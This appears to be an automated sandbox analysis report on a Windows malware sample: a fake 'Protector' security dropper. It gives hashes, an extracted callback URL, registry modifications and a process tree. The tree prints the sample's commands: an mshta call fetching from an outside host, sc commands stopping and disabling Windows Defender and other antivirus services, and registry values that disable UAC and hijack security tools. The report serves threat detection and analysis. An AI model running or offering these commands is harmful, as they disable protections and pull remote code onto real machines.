Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-08-2024 13:08
Static task
static1
Behavioral task
behavioral1
Sample
9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe
-
Size
2.0MB
-
MD5
9334dbb61d19ac21c8f10bcda409a0d0
-
SHA1
0a6bab38061f1681bdc259690699ffc284970648
-
SHA256
0a662bd665b49469f488d81912ae84a7a2506e32a89390134cb0f934b4b57361
-
SHA512
140da6648af9606443db039a0e976fbe327495c665c64c6c35f617c8fcaf7d34e9becc1c3dcbdb5b377811d66959b5c407b749b136597529f406aebc712e2422
-
SSDEEP
49152:DgqdwTzUCSaogJDhTp7iK7VwgwV64rnB/FFc2ORZRO5b2BHzv:DPwTzX7JDhtFCgcrn5A2gRqb2Nzv
Malware Config
Extracted
http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=38&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=gtwlyryxwm&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-oyar.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-oyar.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-oyar.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\proport.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rwg.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet32.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avupgsvc.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctrl.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostc.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netmon.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onsrvr.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoler.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRunDll.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brasil.exe Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frmwrk32.exe Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lordpe.exe Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanpc.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fnrb32.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hotpatch.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nprotect.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcproxy.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPcc.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsx.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkserv.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procdump.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scrscan.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANCU.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsched.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavpers40eng.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows.exe Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmain.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpfservice.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiadmin.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixfp.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prmvr.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Security Center.exe Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmain.exe Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpf202en.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshield.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcc32.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shellspyinstall.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsbgate.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tca.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\esafe.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxiul.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\licmgr.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nstask32.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUNMain.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup_flowprotector_us.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ssg_4104.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxmonitor9x.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\efpeadm.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JsRcGen.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrl-421-en-win.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bidserver.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\n32scanw.exe\Debugger = "svchost.exe" Protector-oyar.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pgmonitr.exe Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tgbob.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcmscsvc.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSACore.exe\Debugger = "svchost.exe" Protector-oyar.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe\Debugger = "svchost.exe" Protector-oyar.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation 518c95wwvsa0z33.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation i9xx8q07h5z9553.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation 9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe -
Executes dropped EXE 3 IoCs
pid Process 3868 518c95wwvsa0z33.exe 3140 i9xx8q07h5z9553.exe 2332 Protector-oyar.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-oyar.exe" Protector-oyar.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-oyar.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-oyar.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-oyar.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-oyar.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4920 sc.exe 2008 sc.exe 1500 sc.exe 4032 sc.exe 2424 sc.exe 956 sc.exe 2700 sc.exe 1708 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 518c95wwvsa0z33.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i9xx8q07h5z9553.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Protector-oyar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-oyar.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-oyar.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3140 i9xx8q07h5z9553.exe Token: SeShutdownPrivilege 3140 i9xx8q07h5z9553.exe Token: SeDebugPrivilege 2332 Protector-oyar.exe Token: SeShutdownPrivilege 2332 Protector-oyar.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3140 i9xx8q07h5z9553.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe 2332 Protector-oyar.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 4276 wrote to memory of 3868 4276 9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe 85 PID 4276 wrote to memory of 3868 4276 9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe 85 PID 4276 wrote to memory of 3868 4276 9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe 85 PID 3868 wrote to memory of 3140 3868 518c95wwvsa0z33.exe 87 PID 3868 wrote to memory of 3140 3868 518c95wwvsa0z33.exe 87 PID 3868 wrote to memory of 3140 3868 518c95wwvsa0z33.exe 87 PID 3140 wrote to memory of 2332 3140 i9xx8q07h5z9553.exe 88 PID 3140 wrote to memory of 2332 3140 i9xx8q07h5z9553.exe 88 PID 3140 wrote to memory of 2332 3140 i9xx8q07h5z9553.exe 88 PID 3140 wrote to memory of 1492 3140 i9xx8q07h5z9553.exe 89 PID 3140 wrote to memory of 1492 3140 i9xx8q07h5z9553.exe 89 PID 3140 wrote to memory of 1492 3140 i9xx8q07h5z9553.exe 89 PID 2332 wrote to memory of 3244 2332 Protector-oyar.exe 91 PID 2332 wrote to memory of 3244 2332 Protector-oyar.exe 91 PID 2332 wrote to memory of 3244 2332 Protector-oyar.exe 91 PID 2332 wrote to memory of 1500 2332 Protector-oyar.exe 99 PID 2332 wrote to memory of 1500 2332 Protector-oyar.exe 99 PID 2332 wrote to memory of 1500 2332 Protector-oyar.exe 99 PID 2332 wrote to memory of 4032 2332 Protector-oyar.exe 100 PID 2332 wrote to memory of 4032 2332 Protector-oyar.exe 100 PID 2332 wrote to memory of 4032 2332 Protector-oyar.exe 100 PID 2332 wrote to memory of 956 2332 Protector-oyar.exe 101 PID 2332 wrote to memory of 956 2332 Protector-oyar.exe 101 PID 2332 wrote to memory of 956 2332 Protector-oyar.exe 101 PID 2332 wrote to memory of 2424 2332 Protector-oyar.exe 103 PID 2332 wrote to memory of 2424 2332 Protector-oyar.exe 103 PID 2332 wrote to memory of 2424 2332 Protector-oyar.exe 103 PID 2332 wrote to memory of 2700 2332 Protector-oyar.exe 104 PID 2332 wrote to memory of 2700 2332 Protector-oyar.exe 104 PID 2332 wrote to memory of 2700 2332 Protector-oyar.exe 104 PID 2332 wrote to memory of 1708 2332 Protector-oyar.exe 105 PID 2332 wrote to memory of 1708 2332 Protector-oyar.exe 105 PID 2332 wrote to memory of 1708 2332 Protector-oyar.exe 105 PID 2332 wrote to memory of 4920 2332 Protector-oyar.exe 106 PID 2332 wrote to memory of 4920 2332 Protector-oyar.exe 106 PID 2332 wrote to memory of 4920 2332 Protector-oyar.exe 106 PID 2332 wrote to memory of 2008 2332 Protector-oyar.exe 107 PID 2332 wrote to memory of 2008 2332 Protector-oyar.exe 107 PID 2332 wrote to memory of 2008 2332 Protector-oyar.exe 107 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-oyar.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-oyar.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-oyar.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-oyar.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9334dbb61d19ac21c8f10bcda409a0d0_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\518c95wwvsa0z33.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\518c95wwvsa0z33.exe" -e -prvmk09hu8168k0o2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\i9xx8q07h5z9553.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\i9xx8q07h5z9553.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Users\Admin\AppData\Roaming\Protector-oyar.exeC:\Users\Admin\AppData\Roaming\Protector-oyar.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2332 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=38&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=gtwlyryxwm&14=1"5⤵
- System Location Discovery: System Language Discovery
PID:3244
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4032
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:956
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2700
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4920
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\I9XX8Q~1.EXE" >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5d7618a6a91030ee055eba04dc8c8d06f
SHA15d80031e752801bc16b8ce794a874c112d5ff33c
SHA2564b3106f9be994add13da28563efd7b7de42518b46e0a04319c99fff6cb130168
SHA5122b7166dd17eb2cc558b274527cb19a43e229f30ded063f44043a2f2107d653cb2902ab11a82f8c0ea2e748ed08ea1a6684b802f912bc9d7feccf0a6b2aeb156c
-
Filesize
1.9MB
MD5ba349f4dd6cab4d4aead3b761248622a
SHA14ef652cf103fbdbbfa16a9cc261ba1f3e1c48997
SHA256b6cc9e59ebfd97150c37ed83e7e5d278a3a69384039ff49be9bf9bc3e44e5b2e
SHA512e6a923ef0abc9c55d6aa408f0d67d86db9773b87e5fabcafa2ab6ae87072832f3e45d75d8605141d465bd39c1ecf2fe73da5dffdd34eeb39ffab85ec822f2c7d